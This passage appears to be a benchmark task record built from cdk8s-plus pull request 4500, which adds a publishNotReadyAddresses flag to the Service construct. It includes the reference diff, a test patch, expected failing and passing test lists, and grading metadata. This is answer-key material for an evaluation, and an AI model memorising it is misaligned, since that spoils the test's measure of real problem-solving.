create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and 
scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 
1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "default security context", "custom security context", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "auto mounting token can be disabled", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork 
is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "only NO_EXECUTE taint queries can specify eviction", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot 
allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "role can bind to imported", "minimal definition", "secrets can be added to the service account", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of 
a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "can set publishNotReadyAddresses", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "Can be exposed as via ingress", "Expose uses 
the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "specify access from props", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, 
a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added" ]
Enum: SeccompProfileType Location: src/container.ts Inputs: No runtime inputs (enum values are compile‑time constants) Outputs: Values ‑ LOCALHOST = 'Localhost', RUNTIME_DEFAULT = 'RuntimeDefault', UNCONFINED = 'Unconfined' Description: Enumerates the allowed seccomp profile sources for a container. Used when constructing a SeccompProfile to indicate which profile type to apply. Interface: SeccompProfile Location: src/container.ts Inputs:   type: SeccompProfileType (required) – the kind of seccomp profile to apply.<br>   localhostProfile?: string (optional) – path to a localhost‑based profile; must be provided only when type is SeccompProfileType.LOCALHOST. Outputs: An object describing the container’s seccomp configuration; validated by ContainerSecurityContext constructor. Description: Represents the seccomp settings that can be attached to a container’s security context. The constructor enforces that localhostProfile is only supplied when type is LOCALHOST. Property: ContainerSecurityContext.seccompProfile Location: src/container.ts (class ContainerSecurityContext) Inputs: props.seccompProfile?: SeccompProfile (optional) – passed via ContainerSecurityContextProps. Outputs: this.seccompProfile?: SeccompProfile – stored on the instance and emitted in the rendered Kubernetes spec. Description: Holds the seccomp profile configuration for a container. When a Container is created with a securityContext containing a seccompProfile, this property is populated; if localhostProfile is set with a non‑LOCALHOST type, the constructor throws an error (“localhostProfile must only be set if type is \"Localhost\"”). 
Constructor Validation (inside ContainerSecurityContext) Location: src/container.ts (constructor) Inputs: props.seccompProfile?.type, props.seccompProfile?.localhostProfile Outputs: May throw Error with message 'localhostProfile must only be set if type is "Localhost"' Description: Ensures that the seccompProfile object is consistent: a localhostProfile can only be specified when the type is SeccompProfileType.LOCALHOST. This validation is exercised by the test that expects an exception for an invalid combination.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 44, "pr_author": "serhatcetinkaya", "pr_labels": [ "backport-to-k8s-28/main: Backport a PR to the k8s-28 branch", "backport-to-k8s-29/main: Backport a PR to the k8s-30 branch" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.30/#seccompprofile-v1-core" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding SeccompProfile support to the container security context, including enum definitions, validation, and serialization. The provided test patch checks default and custom contexts, and enforces that localhostProfile is only allowed with type Localhost, matching the intended behavior. No test misalignments or missing specifications are observed, and the external URL is merely a reference, not a required source of truth. 
Therefore the task is well‑specified and solvable, qualifying as an A‑type task.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
b3399e27a1de60ed09d1a9e43e3ad625369918c8
2024-08-08 11:55:27
cdk8s-team__cdk8s-plus-4500
diff --git a/src/service.ts b/src/service.ts index 871ab86b..27bb6a5f 100644 --- a/src/service.ts +++ b/src/service.ts @@ -94,6 +94,16 @@ export interface ServiceProps extends base.ResourceProps { */ readonly loadBalancerSourceRanges?: string[]; + /** + * The publishNotReadyAddresses indicates that any agent which deals with endpoints for this Service + * should disregard any indications of ready/not-ready + * + * More info: https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.30/#servicespec-v1-core + * + * @default - false + */ + readonly publishNotReadyAddresses?: boolean; + } /** @@ -210,6 +220,7 @@ export class Service extends base.Resource { private readonly _selector: Record<string, string>; private readonly _ports: ServicePort[]; private readonly _loadBalancerSourceRanges?: string[]; + private readonly _publishNotReadyAddresses?: boolean; constructor(scope: Construct, id: string, props: ServiceProps = {}) { super(scope, id); @@ -232,6 +243,7 @@ export class Service extends base.Resource { this._ports = []; this._selector = { }; this._loadBalancerSourceRanges = props.loadBalancerSourceRanges; + this._publishNotReadyAddresses = props.publishNotReadyAddresses; if (props.selector) { this.select(props.selector); @@ -337,6 +349,7 @@ export class Service extends base.Resource { selector: this._selector, ports: ports, loadBalancerSourceRanges: this._loadBalancerSourceRanges, + publishNotReadyAddresses: this._publishNotReadyAddresses, } : { type: this.type, externalName: this.externalName,
feat(service): support `publishNotReadyAddresses` add support for publishNotReadyAddresses. for more info: https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.30/#servicespec-v1-core this should be backported to 1.29 and 1.28 main branches
**Title** Add support for the `publishNotReadyAddresses` option on Service resources **Problem** Creating a Service did not allow callers to control whether endpoints that are not yet ready should be published. This limitation prevented users from configuring services that need to expose pods before they become ready, a feature available in recent Kubernetes API versions. **Root Cause** The Service abstraction omitted the `publishNotReadyAddresses` field from its specification, so the generated manifests never included the corresponding flag. **Fix / Expected Behavior** - Introduce an optional boolean flag in the Service configuration API to control `publishNotReadyAddresses`. - Store the flag internally when provided. - Include the flag in the rendered Service manifest only when set, preserving the default behavior of not publishing not‑ready addresses. - Ensure the default remains false, matching Kubernetes semantics. - Maintain compatibility with existing code that does not set the flag. **Risk & Validation** - Verify that existing services generate identical manifests when the new flag is omitted. - Add tests to confirm that setting the flag results in the correct property appearing in the output manifest. - Run integration checks against the supported Kubernetes versions (1.28‑1.30) to ensure the manifest remains valid.
4,500
cdk8s-team/cdk8s-plus
diff --git a/test/service.test.ts b/test/service.test.ts index 48083e87..106de6bf 100644 --- a/test/service.test.ts +++ b/test/service.test.ts @@ -185,3 +185,14 @@ test('can be exposed by an ingress', () => { const ingress = Testing.synth(chart)[1]; expect(ingress).toMatchSnapshot(); }); + +test('can set publishNotReadyAddresses', () => { + const chart = Testing.chart(); + new kplus.Service(chart, 'service', { + ports: [{ port: 80 }], + publishNotReadyAddresses: true, + }); + + const spec = Testing.synth(chart)[0].spec; + expect(spec.publishNotReadyAddresses).toBeTruthy(); +});
[ "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "can set publishNotReadyAddresses" ]
[ "defaultChild", "default configuration", "custom configuration", "Can be isolated", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "default child", "defaults", "custom", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "can select namespaces", "can select all namespaces", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "can grant permissions on imported", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "role can bind to imported", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can 
override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "can be imported", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can 
add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", 
"creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, 
when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created 
from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", 
"exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "fromCommand", "fromHttpGet", "fromTcpSocket", "Can mutate metadata", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "specify access from props", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing 
container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to 
namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject" ]
Method: Service.constructor(scope: Construct, id: string, props: ServiceProps) Location: src/service.ts Inputs: - **scope** – Construct in which the Service will be defined. - **id** – Unique identifier for the Service construct. - **props** – ServiceProps object; may include the optional boolean **publishNotReadyAddresses** (default false) that indicates endpoints should be published even when not ready. Outputs: Returns a Service instance; during synthesis the generated Service manifest includes `spec.publishNotReadyAddresses` set to the value supplied in props. Description: Constructs a Kubernetes Service; the newly added `publishNotReadyAddresses` flag allows callers (as exercised in the tests) to control whether the Service should expose not‑ready endpoints.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 13, "pr_author": "serhatcetinkaya", "pr_labels": [ "backport-to-k8s-28/main: Backport a PR to the k8s-28 branch", "backport-to-k8s-29/main: Backport a PR to the k8s-30 branch" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.30/#servicespec-v1-core" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding a publishNotReadyAddresses option to Service, providing a Kubernetes doc URL for reference. The test verifies that setting this flag results in the spec containing publishNotReadyAddresses true, which directly matches the stated requirement. There are no mismatches, external dependencies required for correctness, or ambiguous specifications. 
